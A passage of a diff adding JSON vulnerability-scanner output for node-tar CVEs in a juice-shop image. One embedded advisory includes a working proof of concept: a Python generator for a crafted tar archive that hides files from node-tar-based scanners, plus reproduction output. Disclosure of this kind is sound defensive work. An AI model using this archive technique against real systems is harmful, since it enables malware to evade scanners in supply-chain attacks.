concurrency safeguards and permits Symlink Poisoning attacks via race conditions. The library uses a `PathReservations` system to ensure that metadata checks and file operations for the same path are serialized. This prevents race conditions where one entry might clobber another concurrently. This is a Race Condition which enables Arbitrary File Overwrite. This vulnerability affects users and systems using node-tar on macOS (APFS/HFS+). Because of using `NFD` Unicode normalization (in which `ß` and `ss` are different), conflicting paths do not have their order properly preserved under filesystems that ignore Unicode normalization (e.g., APFS (in which `ß` causes an inode collision with `ss`)). This enables an attacker to circumvent internal parallelization locks (`PathReservations`) using conflicting filenames within a malicious tar archive. The patch in version 7.5.4 updates `path-reservations.js` to use a normalization form that matches the target filesystem's behavior (e.g., `NFKD`), followed by first `toLocaleLowerCase('en')` and then `toLocaleUpperCase('en')`. As a workaround, users who cannot upgrade promptly, and who are programmatically using `node-tar` to extract arbitrary tarball data should filter out all `SymbolicLink` entries (as npm does) to defend against arbitrary file writes via this file system entry name collision issue.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-176", + "CWE-352", + "CWE-367" + ], + "VendorSeverity": { + "alma": 3, + "amazon": 3, + "ghsa": 3, + "nvd": 2, + "redhat": 3, + "rocky": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L", + "V3Score": 8.8 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N", + "V3Score": 5.9 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L", + "V3Score": 8.8 + } + }, + "References": [ + "https://access.redhat.com/errata/RHSA-2026:18480", + "https://access.redhat.com/security/cve/CVE-2026-23950", + "https://bugzilla.redhat.com/2425946", + "https://bugzilla.redhat.com/2430538", + "https://bugzilla.redhat.com/2431036", + "https://bugzilla.redhat.com/2431740", + "https://bugzilla.redhat.com/2433645", + "https://bugzilla.redhat.com/show_bug.cgi?id=2425946", + "https://bugzilla.redhat.com/show_bug.cgi?id=2430538", + "https://bugzilla.redhat.com/show_bug.cgi?id=2431036", + "https://bugzilla.redhat.com/show_bug.cgi?id=2431740", + "https://bugzilla.redhat.com/show_bug.cgi?id=2433645", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13465", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15284", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-23745", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-23950", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-24842", + "https://errata.almalinux.org/10/ALSA-2026-18480.html", + "https://errata.rockylinux.org/RLSA-2026:18868", + "https://github.com/isaacs/node-tar", + "https://github.com/isaacs/node-tar/commit/3b1abfae650056edfabcbe0a0df5954d390521e6", + "https://github.com/isaacs/node-tar/security/advisories/GHSA-r6q2-hw4h-h46w", + "https://nvd.nist.gov/vuln/detail/CVE-2026-23950", + "https://www.cve.org/CVERecord?id=CVE-2026-23950" + ], + "PublishedDate": "2026-01-20T01:15:57.87Z", + "LastModifiedDate": "2026-02-18T15:50:29.91Z" + }, + { + "VulnerabilityID": "CVE-2026-24842", + "VendorIDs": [ + "GHSA-34x7-hfp2-rc4v" + ], + "PkgID": "tar@6.2.1", + "PkgName": "tar", + "PkgPath": "juice-shop/node_modules/sqlite3/node_modules/tar/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/tar@6.2.1", + "UID": "6267f7fd036a2dd5" + }, + "InstalledVersion": "6.2.1", + "FixedVersion": "7.5.7", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-24842", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:656cbf10f29456a7f45f4f0548d84bc6d76b66aa6ee1cb129aa89131967c425e", + "Title": "node-tar: tar: node-tar: Arbitrary file creation via path traversal bypass in hardlink security check", + "Description": "node-tar,a Tar for Node.js, contains a vulnerability in versions prior to 7.5.7 where the security check for hardlink entries uses different path resolution semantics than the actual hardlink creation logic. This mismatch allows an attacker to craft a malicious TAR archive that bypasses path traversal protections and creates hardlinks to arbitrary files outside the extraction directory. Version 7.5.7 contains a fix for the issue.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-22", + "CWE-59" + ], + "VendorSeverity": { + "alma": 3, + "amazon": 3, + "ghsa": 3, + "redhat": 3, + "rocky": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N", + "V3Score": 8.2 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N", + "V3Score": 8.2 + } + }, + "References": [ + "https://access.redhat.com/errata/RHSA-2026:18480", + "https://access.redhat.com/security/cve/CVE-2026-24842", + "https://bugzilla.redhat.com/2425946", + "https://bugzilla.redhat.com/2430538", + "https://bugzilla.redhat.com/2431036", + "https://bugzilla.redhat.com/2431740", + "https://bugzilla.redhat.com/2433645", + "https://bugzilla.redhat.com/show_bug.cgi?id=2425946", + "https://bugzilla.redhat.com/show_bug.cgi?id=2430538", + "https://bugzilla.redhat.com/show_bug.cgi?id=2431036", + "https://bugzilla.redhat.com/show_bug.cgi?id=2431740", + "https://bugzilla.redhat.com/show_bug.cgi?id=2433645", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13465", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15284", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-23745", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-23950", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-24842", + "https://errata.almalinux.org/10/ALSA-2026-18480.html", + "https://errata.rockylinux.org/RLSA-2026:18868", + "https://github.com/isaacs/node-tar", + "https://github.com/isaacs/node-tar/commit/f4a7aa9bc3d717c987fdf1480ff7a64e87ffdb46", + "https://github.com/isaacs/node-tar/security/advisories/GHSA-34x7-hfp2-rc4v", + "https://nvd.nist.gov/vuln/detail/CVE-2026-24842", + "https://www.cve.org/CVERecord?id=CVE-2026-24842" + ], + "PublishedDate": "2026-01-28T01:16:14.947Z", + "LastModifiedDate": "2026-02-02T14:30:10.89Z" + }, + { + "VulnerabilityID": "CVE-2026-26960", + "VendorIDs": [ + "GHSA-83g3-92jg-28cx" + ], + "PkgID": "tar@6.2.1", + "PkgName": "tar", + "PkgPath": "juice-shop/node_modules/sqlite3/node_modules/tar/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/tar@6.2.1", + "UID": "6267f7fd036a2dd5" + }, + "InstalledVersion": "6.2.1", + "FixedVersion": "7.5.8", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-26960", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:d8e808c6757c26b31ed30bad4c5b84a799f1df2c16e708cb7163ebb4b7b1e61a", + "Title": "node-tar: node-tar: Arbitrary file read/write via malicious archive hardlink creation", + "Description": "node-tar is a full-featured Tar for Node.js. When using default options in versions 7.5.7 and below, an attacker-controlled archive can create a hardlink inside the extraction directory that points to a file outside the extraction root, enabling arbitrary file read and write as the extracting user. Severity is high because the primitive bypasses path protections and turns archive extraction into a direct filesystem access primitive. This issue has been fixed in version 7.5.8.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-22" + ], + "VendorSeverity": { + "amazon": 3, + "ghsa": 3, + "nvd": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", + "V3Score": 7.1 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", + "V3Score": 7.1 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", + "V3Score": 7.1 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-26960", + "https://github.com/isaacs/node-tar", + "https://github.com/isaacs/node-tar/commit/2cb1120bcefe28d7ecc719b41441ade59c52e384", + "https://github.com/isaacs/node-tar/commit/d18e4e1f846f4ddddc153b0f536a19c050e7499f", + "https://github.com/isaacs/node-tar/security/advisories/GHSA-83g3-92jg-28cx", + "https://nvd.nist.gov/vuln/detail/CVE-2026-26960", + "https://www.cve.org/CVERecord?id=CVE-2026-26960" + ], + "PublishedDate": "2026-02-20T02:16:53.883Z", + "LastModifiedDate": "2026-02-20T19:24:16.537Z" + }, + { + "VulnerabilityID": "CVE-2026-29786", + "VendorIDs": [ + "GHSA-qffp-2rhf-9h96" + ], + "PkgID": "tar@6.2.1", + "PkgName": "tar", + "PkgPath": "juice-shop/node_modules/sqlite3/node_modules/tar/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/tar@6.2.1", + "UID": "6267f7fd036a2dd5" + }, + "InstalledVersion": "6.2.1", + "FixedVersion": "7.5.10", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-29786", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:6f34fbd51b2872f80a6e9c85b494993ba36784dc5e42eef67f6292a4182ea74e", + "Title": "node-tar: hardlink path traversal via drive-relative linkpath", + "Description": "node-tar is a full-featured Tar for Node.js. Prior to version 7.5.10, tar can be tricked into creating a hardlink that points outside the extraction directory by using a drive-relative link target such as C:../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction. This issue has been patched in version 7.5.10.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-22", + "CWE-59" + ], + "VendorSeverity": { + "amazon": 2, + "ghsa": 3, + "nvd": 2, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:H/SA:L", + "V40Score": 8.2 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N", + "V3Score": 6.3 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N", + "V3Score": 8.6 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-29786", + "https://github.com/isaacs/node-tar", + "https://github.com/isaacs/node-tar/commit/7bc755dd85e623c0279e08eb3784909e6d7e4b9f", + "https://github.com/isaacs/node-tar/security/advisories/GHSA-qffp-2rhf-9h96", + "https://nvd.nist.gov/vuln/detail/CVE-2026-29786", + "https://www.cve.org/CVERecord?id=CVE-2026-29786" + ], + "PublishedDate": "2026-03-07T16:15:55.587Z", + "LastModifiedDate": "2026-03-11T21:50:01.91Z" + }, + { + "VulnerabilityID": "CVE-2026-31802", + "VendorIDs": [ + "GHSA-9ppj-qmqm-q256" + ], + "PkgID": "tar@6.2.1", + "PkgName": "tar", + "PkgPath": "juice-shop/node_modules/sqlite3/node_modules/tar/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/tar@6.2.1", + "UID": "6267f7fd036a2dd5" + }, + "InstalledVersion": "6.2.1", + "FixedVersion": "7.5.11", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-31802", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:696a9e3dbee29ed4cab2d4ca85ca873c4087472420916179010151951670f3b1", + "Title": "tar: tar: File overwrite via drive-relative symlink traversal", + "Description": "node-tar is a full-featured Tar for Node.js. Prior to version 7.5.11, tar (npm) can be tricked into creating a symlink that points outside the extraction directory by using a drive-relative symlink target such as C:../../../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction. This vulnerability is fixed in 7.5.11.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-22" + ], + "VendorSeverity": { + "ghsa": 3, + "nvd": 2, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N", + "V40Score": 8.2 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", + "V3Score": 5.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "V3Score": 6.2 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-31802", + "https://github.com/isaacs/node-tar", + "https://github.com/isaacs/node-tar/commit/f48b5fa3b7985ddab96dc0f2125a4ffc9911b6ad", + "https://github.com/isaacs/node-tar/security/advisories/GHSA-9ppj-qmqm-q256", + "https://nvd.nist.gov/vuln/detail/CVE-2026-31802", + "https://www.cve.org/CVERecord?id=CVE-2026-31802" + ], + "PublishedDate": "2026-03-10T07:44:58.02Z", + "LastModifiedDate": "2026-03-18T18:13:34.703Z" + }, + { + "VulnerabilityID": "CVE-2026-53655", + "VendorIDs": [ + "GHSA-vmf3-w455-68vh" + ], + "PkgID": "tar@6.2.1", + "PkgName": "tar", + "PkgPath": "juice-shop/node_modules/sqlite3/node_modules/tar/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/tar@6.2.1", + "UID": "6267f7fd036a2dd5" + }, + "InstalledVersion": "6.2.1", + "FixedVersion": "7.5.16", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-53655", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:011fd72ee30ca61b1a738dc00aab515668cba89d216a41241594cbb28f09d398", + "Title": "node-tar applies PAX size override to intermediary GNU long-name/long-link headers, causing tar parser interpretation differential (file smuggling)", + "Description": "### Summary\n\n`tar` (node-tar) applies a PAX extended header's `size=` record (and other PAX\noverrides) to the **next header entry of any type**, including intermediary\nmetadata headers such as a GNU long-name (`L`) or long-link (`K`) entry. Per\nPOSIX pax, a PAX extended header (`x`) describes the *next file entry*, not the\nintermediary extension headers that may sit between the `x` header and the file\nit annotates. Because node-tar lets the PAX `size` override the byte length of\nan intervening `L`/`K`/`x` header, an attacker can desynchronize node-tar's\nstream cursor relative to every other mainstream tar implementation\n(GNU tar, libarchive/bsdtar, Python `tarfile`, and the now-fixed `tar-rs` /\n`astral-tokio-tar`).\n\nThe result is a tar parser **interpretation differential** (CWE-436): a single\ncrafted archive yields a different set of members under node-tar than under the\nreference tar tools. An attacker can use this to hide a member from one parser\nwhile it is visible to another, which defeats security tooling whose scanner and\nextractor disagree on archive contents (e.g. a malware/secret scanner that lists\nentries with one library while a downstream step extracts with another). node-tar\nis one of the most widely deployed JavaScript tar libraries (it backs `npm`'s own\npackage-tarball handling and is a transitive dependency of a very large fraction\nof the npm ecosystem), so the blast radius for \"files that extract differently\ndepending on the tool\" is broad.\n\nThis is the same root cause and fix that was just addressed upstream in the Rust\ntar ecosystem (`tar-rs` / `astral-tokio-tar`); node-tar carries the equivalent\ndefect and has no equivalent guard.\n\n### Impact\n\n- CWE-436 Interpretation Conflict / inconsistent tar parsing (the same class as\n the prior tar \"smuggling\" advisories GHSA-j5gw-2vrg-8fgx and\n GHSA-fp55-jw48-c537).\n- A crafted archive can present one logical member list to a tool that lists or\n scans with node-tar and a different member list to GNU tar / libarchive /\n Python tarfile (and vice versa). This lets a malicious file be hidden from a\n scanner that uses a different parser than the eventual extractor, or hidden\n from node-tar-based inspection while still landing on disk via a system `tar`.\n- No authentication is required; the only precondition is that a victim parses\n an attacker-supplied tar with node-tar. Tar archives are routinely fetched\n from untrusted sources (package registries, user uploads, CI artifacts,\n container layers).\n- Severity: Medium. Impact is integrity-of-archive-interpretation, not direct\n RCE; it is a building block for supply-chain / scanner-evasion attacks rather\n than a standalone code-execution primitive.\n\n### Vulnerable code (file:line)\n\n`src/header.ts` (compiled to `dist/esm/header.js:49` and\n`dist/commonjs/header.js:85` in the published `tar@7.5.15`):\n\n```ts\n// Header.decode(buf, off, ex, gex)\nthis.size = ex?.size ?? gex?.size ?? decNumber(buf, off + 124, 12)\n```\n\n`ex` is the currently-accumulated PAX **local** extended header and `gex` the\nPAX **global** header. The `size` override from `ex`/`gex` is applied\nunconditionally to whatever header is being decoded next — there is no check\nthat the header being decoded is a real *file* entry rather than an intermediary\nextension header.\n\n`src/parse.ts`, `[CONSUMEHEADER]` constructs the next header with the current\n`EX`/`GEX` applied:\n\n```ts\nconst header = new Header(chunk, position, this[EX], this[GEX])\n```\n\nand later branches on whether that header is a metadata entry. `this[EX]` is\ncleared only in the non-meta (real file) branch:\n\n```ts\nif (entry.meta) {\n // L / K / x / g metadata entries: this[EX] is left intact here\n if (entry.size \u003e this.maxMetaEntrySize) {\n entry.ignore = true\n this[STATE] = 'ignore'\n entry.resume()\n } else if (entry.size \u003e 0) {\n this[META] = ''\n entry.on('data', c =\u003e (this[META] += c))\n this[STATE] = 'meta'\n }\n} else {\n this[EX] = undefined // EX cleared only once a real file entry is reached\n}\n```\n\nWhen the stream is ordered `x (PAX, size=N) -\u003e L (GNU long-name) -\u003e file`, the\n`L` header is constructed with `this[EX]` still set, so its `size`/`remain`\nbecomes `N` instead of the `L` payload's true length. node-tar then consumes `N`\nbytes of \"metadata\" and resumes header parsing at the wrong offset, landing\nmid-stream. Every other mainstream parser applies the PAX `size` only to the\nfollowing *file* entry, so they stay synchronized.\n\nThe correct behavior (and the fix shipped upstream in the Rust tar ecosystem) is\nto **not** apply PAX `size`/overrides when the entry being decoded is itself an\nextension header (`L` GNU long-name, `K` GNU long-link, `x` PAX local, `g` PAX\nglobal).\n\n### How input reaches the sink\n\n`tar.list()`, `tar.extract()`/`tar.x()`, and `tar.Parse`/`tar.Unpack` all route\nevery 512-byte header block through `Header.decode(...)` with the\ncurrently-accumulated `EX`/`GEX`. Any consumer that parses an attacker-supplied\narchive — `tar.list`, `tar.extract`, or piping into the streaming `Parser` —\nreaches the sink. No options need to be enabled; the default code path is\naffected.\n\n### Proof of concept\n\nArchive layout (all standard, GNU-tar-producible blocks):\n\n```\nblock 0 : x header (PAX local extended, typeflag 'x'), its own size = len(pax body)\nblock 1 : x payload : the single PAX record \"...size=2048\\n\"\nblock 2 : L header (GNU long-name '././@LongLink'), real size = 13\nblock 3 : L payload : \"longname.txt\\0\" (the long name for the next file)\nblock 4 : file header 'file_a', size = 16\nblock 5 : file_a body (16 bytes, zero-padded to 512)\nblock 6 : file header 'file_b', size = 16\nblock 7 : file_b body (16 bytes, zero-padded to 512)\n```\n\nGenerator (`make_tar.py`, pure stdlib, no external deps):\n\n```python\ndef hdr(name, size, typeflag):\n h = bytearray(512); name = name[:100]; h[0:len(name)] = name\n h[100:108] = b'0000644\\0'; h[108:116] = b'0000000\\0'; h[116:124] = b'0000000\\0'\n h[124:136] = ('%011o\\0' % size).encode(); h[136:148] = b'00000000000\\0'\n h[156:157] = typeflag; h[257:263] = b'ustar\\0'; h[263:265] = b'00'\n h[148:156] = b' ' * 8\n cs = sum(h); h[148:156] = ('%06o\\0 ' % cs).encode()\n return bytes(h)\n\ndef pad(d):\n return d + b'\\0' * ((512 - len(d) % 512) % 512)\n\ndef pax_record(key, val): # length-prefixed PAX record \"LEN key=val\\n\"\n body = b' %s=%s\\n' % (key.encode(), str(val).encode()); n = len(body)\n while True:\n s = str(n).encode() + body\n if len(s) == n: break\n n = len(s)\n return s\n\npax = pax_record('size', 2048) # malicious: claim size=2048 for the \"next\" entry\nout = hdr(b'PaxHeaders/x', len(pax), b'x') + pad(pax)\nout += hdr(b'././@LongLink', 13, b'L') + pad(b'longname.txt\\0')\nout += hdr(b'file_a', 16, b'0') + pad(b'AAAA_file_a_body')\nout += hdr(b'file_b', 16, b'0') + pad(b'BBBB_file_b_body')\nout += b'\\0' * 1024\nopen('pax-desync.tar', 'wb').write(out)\n```\n\nA negative-control archive is identical except the PAX record is\n`pax_record('comment', 'x')` (no `size=`), written to `pax-control.tar`.\n\n### End-to-end reproduction (against pinned version `tar@7.5.15`, latest release)\n\nInstall the published package into a clean project and parse both archives:\n\n```\n$ npm init -y \u003e/dev/null \u0026\u0026 npm install tar@7.5.15\n$ node -e \"console.log(require('tar/package.json').version)\"\n7.5.15\n$ grep -n \"ex?.size ?? gex?.size\" node_modules/tar/dist/esm/header.js\n49: this.size = ex?.size ?? gex?.size ?? decNumber(buf, off + 124, 12);\n```\n\n`e2e.mjs`:\n\n```js\nimport * as tar from 'tar'\nasync function listEntries(f){\n const got=[], warns=[]\n await tar.list({ file:f, onReadEntry:e=\u003e{ got.push({path:e.path,size:e.size,type:e.type}); e.resume() },\n onwarn:(code,_msg)=\u003ewarns.push(code) })\n return { got, warns }\n}\nconst mal = await listEntries('pax-desync.tar')\nconsole.log('MALICIOUS entries :', JSON.stringify(mal.got), 'warnings:', JSON.stringify(mal.warns))\nconst ctl = await listEntries('pax-control.tar')\nconsole.log('CONTROL entries :', JSON.stringify(ctl.got), 'warnings:', JSON.stringify(ctl.warns))\n```\n\nVerbatim output:\n\n```\n=== Deployed-consumer E2E: npm tar@7.5.15 (latest release) ===\n\n[MALICIOUS] archive = x(PAX size=2048) -\u003e L(GNU longname \"longname.txt\") -\u003e file_a(16B) -\u003e file_b(16B)\n tar.list() entries : []\n tar.list() warnings: [\"TAR_ENTRY_INVALID\"]\n\n[NEGATIVE CONTROL] same archive, PAX record is \"comment=x\" (no size= override)\n tar.list() entries : [{\"path\":\"longname.txt\",\"size\":16,\"type\":\"File\"},{\"path\":\"file_b\",\"size\":16,\"type\":\"File\"}]\n tar.list() warnings: []\n```\n\nReference parsers on the **same** `pax-desync.tar`:\n\n```\n$ tar tvf pax-desync.tar\n-rw-r--r-- 0 0 0 2048 Jan 1 1970 longname.txt # GNU tar\n\n$ bsdtar tvf pax-desync.tar\n-rw-r--r-- 0 0 0 2048 Jan 1 1970 longname.txt # libarchive\n\n$ python3 -c \"import tarfile; print([m.name for m in tarfile.open('pax-desync.tar').getmembers()])\"\n['longname.txt'] # Python tarfile\n```\n\nInterpretation differential: GNU tar, libarchive (bsdtar), and Python `tarfile`\nall extract the member `longname.txt` from `pax-desync.tar`, whereas node-tar\n`7.5.15` desynchronizes, raises `TAR_ENTRY_INVALID` (checksum failure from\nlanding mid-stream), and reports **zero** members. The negative control proves\nthe divergence is caused solely by the PAX `size=` override being applied to the\nintermediary `L` header — when the same archive carries a PAX record without\n`size=`, node-tar parses it identically to the reference tools\n(`longname.txt`, `file_b`).\n\n### Suggested fix\n\nWhen decoding a header, do not apply PAX `size` (or other PAX overrides) if the\nheader being decoded is itself an extension header. Concretely, in\n`src/parse.ts` clear/ignore `this[EX]` (and `this[GEX]` for `size`) when the\nheader's type is `ExtendedHeader`, `GlobalExtendedHeader`, `NextFileHasLongPath`\n(GNU `L`), or `NextFileHasLongLinkpath` (GNU `K`); equivalently, in\n`Header.decode`, gate the `ex?.size ?? gex?.size` override on the decoded type\nnot being one of those extension types. This mirrors the upstream Rust fix,\nwhich guards `pax_size` with\n`is_gnu_longname || is_gnu_longlink || is_pax_local_extensions || is_pax_global_extensions`.\n\nA fix PR is being prepared against a private fork and will be linked here.\n\n### Fix PR\n\nTo be linked from a private fork of the repository (the fix will not be pushed\nto any public fork or to upstream during embargo).\n\n### Credits\n\nReported by tonghuaroot.", + "Severity": "MEDIUM", + "VendorSeverity": { + "ghsa": 2 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N", + "V40Score": 6.9 + } + }, + "References": [ + "https://github.com/isaacs/node-tar", + "https://github.com/isaacs/node-tar/security/advisories/GHSA-vmf3-w455-68vh" + ] + }, + { + "VulnerabilityID": "CVE-2026-53655", + "VendorIDs": [ + "GHSA-vmf3-w455-68vh" + ], + "PkgID": "tar@7.5.15", + "PkgName": "tar", + "PkgPath": "juice-shop/node_modules/tar/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/tar@7.5.15", + "UID": "206ab5cdc791e56a" + }, + "InstalledVersion": "7.5.15", + "FixedVersion": "7.5.16", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-53655", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:c7a5863cb143f34cdbf44680a8fa6a82967c150bf362fcfadead97d56a2dd2e2", + "Title": "node-tar applies PAX size override to intermediary GNU long-name/long-link headers, causing tar parser interpretation differential (file smuggling)", + "Description": "### Summary\n\n`tar` (node-tar) applies a PAX extended header's `size=` record (and other PAX\noverrides) to the **next header entry of any type**, including intermediary\nmetadata headers such as a GNU long-name (`L`) or long-link (`K`) entry. Per\nPOSIX pax, a PAX extended header (`x`) describes the *next file entry*, not the\nintermediary extension headers that may sit between the `x` header and the file\nit annotates. Because node-tar lets the PAX `size` override the byte length of\nan intervening `L`/`K`/`x` header, an attacker can desynchronize node-tar's\nstream cursor relative to every other mainstream tar implementation\n(GNU tar, libarchive/bsdtar, Python `tarfile`, and the now-fixed `tar-rs` /\n`astral-tokio-tar`).\n\nThe result is a tar parser **interpretation differential** (CWE-436): a single\ncrafted archive yields a different set of members under node-tar than under the\nreference tar tools. An attacker can use this to hide a member from one parser\nwhile it is visible to another, which defeats security tooling whose scanner and\nextractor disagree on archive contents (e.g. a malware/secret scanner that lists\nentries with one library while a downstream step extracts with another). node-tar\nis one of the most widely deployed JavaScript tar libraries (it backs `npm`'s own\npackage-tarball handling and is a transitive dependency of a very large fraction\nof the npm ecosystem), so the blast radius for \"files that extract differently\ndepending on the tool\" is broad.\n\nThis is the same root cause and fix that was just addressed upstream in the Rust\ntar ecosystem (`tar-rs` / `astral-tokio-tar`); node-tar carries the equivalent\ndefect and has no equivalent guard.\n\n### Impact\n\n- CWE-436 Interpretation Conflict / inconsistent tar parsing (the same class as\n the prior tar \"smuggling\" advisories GHSA-j5gw-2vrg-8fgx and\n GHSA-fp55-jw48-c537).\n- A crafted archive can present one logical member list to a tool that lists or\n scans with node-tar and a different member list to GNU tar / libarchive /\n Python tarfile (and vice versa). This lets a malicious file be hidden from a\n scanner that uses a different parser than the eventual extractor, or hidden\n from node-tar-based inspection while still landing on disk via a system `tar`.\n- No authentication is required; the only precondition is that a victim parses\n an attacker-supplied tar with node-tar. Tar archives are routinely fetched\n from untrusted sources (package registries, user uploads, CI artifacts,\n container layers).\n- Severity: Medium. Impact is integrity-of-archive-interpretation, not direct\n RCE; it is a building block for supply-chain / scanner-evasion attacks rather\n than a standalone code-execution primitive.\n\n### Vulnerable code (file:line)\n\n`src/header.ts` (compiled to `dist/esm/header.js:49` and\n`dist/commonjs/header.js:85` in the published `tar@7.5.15`):\n\n```ts\n// Header.decode(buf, off, ex, gex)\nthis.size = ex?.size ?? gex?.size ?? decNumber(buf, off + 124, 12)\n```\n\n`ex` is the currently-accumulated PAX **local** extended header and `gex` the\nPAX **global** header. The `size` override from `ex`/`gex` is applied\nunconditionally to whatever header is being decoded next — there is no check\nthat the header being decoded is a real *file* entry rather than an intermediary\nextension header.\n\n`src/parse.ts`, `[CONSUMEHEADER]` constructs the next header with the current\n`EX`/`GEX` applied:\n\n```ts\nconst header = new 